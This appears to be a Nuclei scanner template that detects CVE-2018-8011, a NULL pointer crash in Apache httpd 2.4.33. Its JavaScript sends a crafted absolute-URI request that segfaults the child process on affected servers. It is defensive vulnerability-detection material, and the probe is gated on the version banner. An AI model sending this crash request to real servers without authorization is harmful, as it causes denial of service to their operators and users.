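id: CVE-2018-8011

info:
  name: Apache HTTP Server - NULL Pointer Dereference
  author: daffainfo
  severity: high
  description: |
    By specially crafting HTTP requests, the mod_md challenge handler would dereference a NULL pointer and cause the child process to segfault. This could be used to DoS the server. Fixed in Apache HTTP Server 2.4.34 (Affected 2.4.33)
  impact: |
    Attackers can cause server crashes leading to denial of service, disrupting service availability.
  remediation: |
    Update to version 2.4.34 or later.
  reference:
    - https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2018-8011
    - https://nvd.nist.gov/vuln/detail/CVE-2018-8011
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
    cvss-score: 7.5
    cve-id: CVE-2018-8011
    cwe-id: CWE-119
    epss-score: 0.77676
    epss-percentile: 0.99012
    cpe: cpe:2.3:a:apache:http_server:2.4.33:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: apache
    product: http_server
    shodan-query: cpe:"cpe:2.3:a:apache:http_server"
  tags: cve,cve2018,js,apache,httpd,dos,vkev

javascript:
  - code: |
      // Detection flow:
      //   1. Open a connection (TLS first, plain TCP as fallback).
      //   2. Send a normal request and read the Apache version from the response.
      //   3. Only when that version is compatible with the affected release
      //      (2.4.33 per the description), send the second request and treat a
      //      failed read on the same connection as the crash signal.
      //
      // Active check: on an affected server the second request segfaults the
      // child process serving this connection (see description).
      //
      // Known limits of the signal: a failed read is also what a receive
      // timeout or a connection the server closed after the first response
      // looks like, and the version comes from a banner an operator can
      // change. The version gate below keeps the probe away from servers
      // whose banner already rules them out, which removes most of those
      // false positives; confirm a hit against the installed package version.
      const net = require("nuclei/net");

      const address = `${Host}:${Port}`;
      const validRequest = `GET / HTTP/1.1\r\nHost: ${Host}\r\n\r\n`;
      const dosRequest = `GET http://${Host} HTTP/1.1\r\nHost: ${Host}\r\n\r\n`;

      let conn;
      try {
        conn = net.OpenTLS('tcp', address);
      } catch {
        conn = net.Open('tcp', address);
      }

      let isAffectedApache = false;
      let isUp = true;

      try {
        // The response must contain Apache/([0-9.]+)
        conn.Send(validRequest);
        const banner = conn.RecvString();
        const match = banner.match(/Apache\/([0-9.]+)/);

        if (match) {
          // A truncated banner ("2" or "2.4") cannot rule out 2.4.33, so it
          // is still probed; any other full version is treated as unaffected.
          const version = match[1];
          isAffectedApache =
            version === '2.4.33' || version === '2.4' || version === '2';
        }

        if (isAffectedApache) {
          try {
            conn.Send(dosRequest);
            conn.RecvString();
          } catch {
            isUp = false;
          }
        }
      } finally {
        // Release the socket even when the first exchange throws.
        conn.Close();
      }

      if (isAffectedApache && !isUp) {
        Export("Vulnerable to CVE-2018-8011")
      } else {
        Export("Not Vulnerable")
      }

    args:
      Host: "{{Host}}"
      Port: 80,443 # if port not specified, defaults to both 80 and 443

    exclude-ports: "0" # override default skip list of 80,443,8080,8443
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Vulnerable to CVE-2018-8011'

      - type: dsl
        dsl:
          - success == true
# NOTE(review): the digest below was generated for the original template text; re-sign the template after applying any edit.
# digest: 4b0a00483046022100f8febbd04c14bcc02af0a806b1c9a0153a4d22d8cb45615ef17373a6163449bb022100c015108e90b8ee7367f9ce07be76a383eed7aca869a7f761fe7041b662a961f7:922c64590222798bb761d5b6d8e72950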